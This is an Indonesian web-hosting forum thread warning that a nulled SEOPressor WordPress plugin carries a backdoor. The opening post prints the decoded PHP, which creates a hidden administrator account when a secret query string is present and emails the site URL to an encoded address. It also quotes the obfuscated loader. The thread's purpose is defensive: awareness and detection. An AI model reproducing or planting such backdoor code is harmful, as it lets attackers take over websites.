Hati2 SEOPressor Nulled, Ada Backdoor-nya $OOO0O0O00

Discussion in 'Desain Web dan Programming' started by PusatHosting, 19 Oct 2015.

Thread Status:
Not open for further replies.
  1. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,388
    Likes Received:
    333
    Trophy Points:
    83
    Baru saja menemukan file agak aneh milik client di plugin seopressor dan setelah googling akhirnya menemukan bahwa file tersebut merupakan bawaan dari plugin seopressor yang nulled.

    hasil decode dengan unphp http://www.unphp.net/decode/d53ec81359b31def2888105e0462a5a1/
    Code:
    <?php ?><?php
    add_action('wp_head', 'vg4beaws');
    function vg4beaws() {
    If ($_GET['cms'] == 'jjoplmh') {
    require ('wp-includes/registration.php');
    If (!username_exists('wordpress')) {
    $user_id = wp_create_user('wordpress', 'gh67io9Cjm');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
    }
    }
    }
    add_action('wp_head', 'm6yascfv');
    function m6yascfv() {
    If (!username_exists('wordpress')) {
    $addressdecode = base64_decode("cGhpbGx5Y2hhZEBnbXguY29t");
    $vari = 'Wordpress Plugin covertplayer';
    mail($addressdecode, get_bloginfo('wpurl'), $vari);
    }
    }
    ?><?php
    
    sebagian dari script aslinya ini
    Code:
    <?php //
    $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=23904;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO000
    
    Jika plugin aktif maka hacker bisa dengan mudah meng-insert user baru dengan level akses administrator dan selanjutnya hacker bisa melakukan apapun pada website target.

    Silahkan dimasukkan ke database scan manual karena maldet belum bisa mendeteksi dan kalau menggunakan http://www.abuseat.org/findbot.pl bisa tapi sayang tidak mengirim email alert.

    Sumber lain : http://bestblackhatforum.com/Thread-GET-SEOPressor-UNLIMITED-nulled-V-4-3-11-Latest-Updates?page=7
     
  2. pluto01

    pluto01 Hosting Guru Web Hosting

    Messages:
    3,797
    Likes Received:
    776
    Trophy Points:
    113
    Thanks sharednya Mas
     
  3. susan

    susan Apprentice 1.0

    Messages:
    291
    Likes Received:
    37
    Trophy Points:
    28
    bisa dishare md5 hash utk filenya, thanks
     
  4. Indodata

    Indodata Apprentice 1.0

    Messages:
    327
    Likes Received:
    35
    Trophy Points:
    28
    Beberapa yang saya temukan seperti theme nulled, plugin terkadang disisipin sesuatu ntah itu backdor, cryptoPHP dll
    Sebaiknya gunakan versi asli atau cari yang free yang powerfull.
     
  5. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,388
    Likes Received:
    333
    Trophy Points:
    83
    Filternya berdasarkan string yang ada di dalamnya saja tidak menggunakan md5
     
  6. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,366
    Likes Received:
    107
    Trophy Points:
    63
    terima kasih sharenya mas mungkin bisa kita cek ricek :)
     
  7. idnix

    idnix Hosting Guru

    Messages:
    1,018
    Likes Received:
    193
    Trophy Points:
    63
    nulled emang rata2 begitu kan om?
     
    PelajarHosting likes this.
  8. sigmabisnis

    sigmabisnis Hosting Guru Web Hosting (Company)

    Messages:
    2,200
    Likes Received:
    146
    Trophy Points:
    63
    Thanks for infonya mas.
     
  9. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,388
    Likes Received:
    333
    Trophy Points:
    83
    Iya betul, tapi untuk seopressor ini semenjak saya beli masih murah beberapa tahun lalu baru kali ini tahu ada nulled-nya dan ada backdoornya lagi.
     
  10. masiqbal

    masiqbal Expert 2.0

    Messages:
    907
    Likes Received:
    266
    Trophy Points:
    63
    Masalahnya banyak orang awam yg tidak tahu resiko menggunakan unofficial plugin (apalagi nulled), yg dia pikir hanya bagaimana caranya agar websitenya bagus.
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...